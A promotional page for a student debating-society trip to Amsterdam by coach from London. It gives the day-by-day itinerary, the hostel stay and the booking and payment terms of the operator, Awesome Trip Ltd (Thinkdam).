Holland’s capital is one of the most visited cities in Europe, and for good reason! Visit the world class museums, cruise along the UNESCO world heritage canals and even visit the city’s famous red-light district! Join us on a legendary bar crawl through Amsterdam, where we’ll take you to the best bars and clubs in the city!
After arriving at your university’s pick-up point, you can kick back and relax on one of our super comfy coaches. We’ll be leaving London at 10pm and head down to Dover.
Arrive in Amsterdam city centre in the morning and drop off your bags in the hostel. You’ll have the morning to grab some breakfast look around Amsterdam, and we’ll show you the best places to go and see. In the afternoon join us in a lively discussion event at one of Amsterdams famous 'Coffee Shops'. We’ll be facilitating the discussion event and will be sending out planned topics before the trip, it’s a great chance to get to know other debating and philosophy societies. In the evening you'll have more free time to explore Amsterdam by night, check out local restaurants, bars and other evening attractions before coming back to the Hans Brinker hostel in the city centre.
Enjoy a free breakfast at the hostel, you’ll have the morning to yourselves, we recommend visiting some of Amsterdams world class museums and galleries. Join us for a debate event in the afternoon, we’ll be sending out the topics before the trip to give you time to prepare, so bring your A game! In the evening you can join us for a legendary bar crawl around some of Amsterdams best bars and clubs, this is not one to miss!
Thinkdam will be taking over the Hans Brinker, which famously sells itself as the world's worst hostel! (We can assure you it’s not). Its right in the city center so you don’t have to worry about transport anywhere! We are sure you will enjoy the comfy beds, cheap pints and underground club in the hostel, it has a super friendly environment and is great for meeting new people.
You will need to pay the remainder of the trip balance by May 22, 2019.
You (hereafter referred to as the 'you' or 'the guest') are forming this contract with Awesome Trip Ltd (hereafter referred to as AwesomeTrip), of registered address 21 Shoreditch House, Charles Square, London, N1 6HL. Awesome Trip Ltd trades as Thinkdam.
Full payment for the trip must be received on or before May 22, 2019 travel. If you fail to make full payment by this date your trip may be cancelled by AwesomeTrip with no refund given. |
Subsets and Splits